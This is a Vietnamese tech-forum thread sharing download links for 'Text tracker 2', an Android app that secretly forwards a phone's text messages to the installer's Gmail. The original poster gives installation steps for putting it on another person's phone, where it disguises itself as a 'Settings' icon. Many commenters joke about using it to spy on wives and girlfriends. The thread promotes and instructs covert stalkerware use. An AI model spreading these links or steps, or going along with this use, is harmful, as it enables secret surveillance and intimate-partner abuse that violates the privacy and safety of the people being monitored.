Text tracker 2 v2.5.02.1 - Theo dõi tin nhắn trên máy Android khác

uroif
20/5/2011 2:6Phản hồi: 398
Text tracker 2 v2.5.02.1 - Theo dõi tin nhắn trên máy Android khác
- Theo dõi tin nhắn đến/đi trên điện thoại, gửi đến hòm thư gmail của bạn một cách bí mật.
- Yêu cầu: Android 1.5+

Market
Code:
https://market.android.com/details?id=com.devfo.mkt.tex2utils
Tải về
Code:
https://www.box.com/s/wyqe8dni3cet9uaehn3k
Lưu ý: máy Android cài phần mềm này đòi hỏi có kết nối internet (GPRS/3G hoặc Wifi...)
398 bình luận
Chia sẻ

Xu hướng

Cái này có thể đọc trộm tin nhắn ư
uroif
TÍCH CỰC
13 năm
Gửi tin nhắn từ máy của vợ (con) của bạn vào email của bạn.
nó chạy ngầm được không bro,
uroif
TÍCH CỰC
13 năm
Nó chạy ngầm mà bạn.
@uroif Pro ơi,sao mail của mình chỉ nhận được tin nhắn đi mà không thấy tin nhắn gửi đến nhỉ?
Thế này thì khối anh mua Android cho vợ hoặc cho bồ nhỉ...😁
@No_Spider Hehehe, làm 1 cái đem tặng mới được. Con bồ mình hay đi ngang về tắt lắm, lại hay xem tin nhắn theo kiểu buôn bạc giả :D
@kgc Thế thì chia tay luôn đi cần chi phải theo dõi hả bác :D
phải dụ vợ xài android thôi, léng phéng là anh biết hết nhé ;)
Sặc Sặc Sặc... Cái này thì chồng của thím Hương phải suy nghĩ trước khi làm 1 cái gì đấy uẩn khúc.
Sr thím Hương nha, em không cố ý mà chỉ... cố tình thôi.
dzungtitoe
ĐẠI BÀNG
13 năm
Quá hay,đúng là pro cao thủ thật,đã test và thấy quá ngon,nếu kiểu này mà có vợ lăng nhăng thì đọc tin nhắn chắc đau tim mất.
không phải đau tim mà đứng tim lun ý pác ạ 😆
vợ em dùng 1100i có theo dõi đc k nhỉ?
Bác nào dung rồi hướng dẫn e cái,e cài vào rồi nó ra cái display setting là sao nhỉ?
Mình cũng như bác vậy ..mình lấy gmail của mình vào rồi làm cách nào thiết lập đến máy của người nhà hả ta .. Làm sao các bác
Nguy hiểm thật, oánh giấu theo dõi topic lúc cần thì dùng
DarkLuck
ĐẠI BÀNG
13 năm
đánh dấu ..................
andy810326
ĐẠI BÀNG
13 năm
lúc trước có xài rồi, nó báo rất chi tiết, ngày/giờ mọi hoạt động, gần như phần mềm key-logger của PC.
Phần mềm này hay nhỉ tiếc là bx không dùng ảndroid mà chỉ có mỗi mình dùng. Thôi lấy về cho vợ tiện theo dõi vậy 😃

Sent from my HTC HD2 using Tapatalk
các bác nào dùng rồi xin chỉ tận tình cho em với em xin tks luôn, em làm các bước rồi đền khi vào nó cũng ra display setting :|
bác nào hướng dẫn sd đi
Cao thru nào hướng dẫn anh em đi.Có cài này quản lí ny ổn đấy ạ:">
không ai hướng dẫn sử dụng àhh, các pro chỉ giáo đi nào, up cho mọi người biết, phần mềm hay mà chưa bik dùng :-s
theo E nghĩ, PM này dùng để cài lên đt của người nào mình muốn xem trộm sms. Nó như là trojan, người nào bị cài cái này, toàn bộ sms sẽ được gửi vào email được cài trên đt đó.
Em là em khoái vụ này rồi đấy, ai test rồi thì hướng dẫn mọi người với. Thank
uroif
TÍCH CỰC
13 năm
😃 Hướng dẫn cài đặt cho các bạn:
- Phần mềm này CHỈ CÀI TRÊN MÁY ĐIỆN THOẠI ANDROID CỦA NGƯỜI KHÁC, có nghĩa là bạn muốn theo dõi tin nhắn trên máy của ai thì cài vào máy người đó.
- Sau khi cài đặt xong, bạn chọn Open chạy phần mềm để thiết lập:
Gmail: Bạn nhập địa chỉ gmail của bạn, PHẢI LÀ HÒM THƯ GMAIL và NHẬP ĐẦY ĐỦ.
Gmail password: Bạn nhập mật khẩu hòm thư gmail của bạn.
- LƯU Ý QUAN TRỌNG:
+ PHẢI NHẬP CHÍNH XÁC VÌ BẠN CHỈ CÓ THỂ NHẬP MỘT LẦN, NẾU MUỐN THAY ĐỔI ACCOUNT/PASSWORD CỦA GMAIL BẠN PHẢI GỠ PHẦN MỀM VÀ CÀI LẠI.
+ NẾU NHẬP THÀNH CÔNG PHẦN MỀM SẼ TỰ ĐÓNG LẠI (SAU KHI CÓ THÔNG BÁO)
+ THIẾT LẬP XONG, PHẦN MỀM SẼ CÓ BIỂU TƯỢNG DẠNG
VÀ TÊN LÀ SETTINGS, DO VẬY KHI BẠN NHẤN VÀO NÓ SẼ ĐƯA BẠN VÀO PHẦN DISPLAY SETTINGS
- Nếu muốn gỡ bỏ phần mềm bạn chỉ cần tìm tên phần mềm Settings như hình dưới là được.
Làm gì có chuyện phải xài đúng account đăng ký android đó, nó có nói đây nè: "Enter a Gmail account that you want all messages sent to. You MUST use a Gmail account. We suggest that you create a new account just for this app."
@uroif
@uroif cho e hỏi là phần mềm này free hoàn toàn hả bác.
@uroif May em báo lỗi này là sao bác. Trong khi gmail của e vẫn dùng gửi và nhận tín nhắn như bình thường.Test email failed. Is your account info correct? Does the phone have reception?
Nhưng cái này cần $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
dzungtitoe
ĐẠI BÀNG
13 năm
Cài đặt bình thường,cứ yes là ok luôn,khi nào đến địa chỉ mail thì điền vào mail mà mình hay sử dụng,gõ pass vào rồi ok
mail báo đã chận phần mềm đó,cứ thế mà nhận tin nhắn của vợ thôi,nếu k nhận đc thì có khả năng mail chặn spam,vào spam là có liền

Xu hướng

Bài mới

• Chịu trách nhiệm nội dung: Trần Mạnh Hiệp
  • © 2024 Công ty Cổ phần MXH Tinh Tế
  • Địa chỉ: Số 70 Bà Huyện Thanh Quan, P. Võ Thị Sáu, Quận 3, TPHCM
  • Số điện thoại: 02822460095
  • MST: 0313255119
  • Giấy phép thiết lập MXH số 11/GP-BTTTT, Ký ngày: 08/01/2019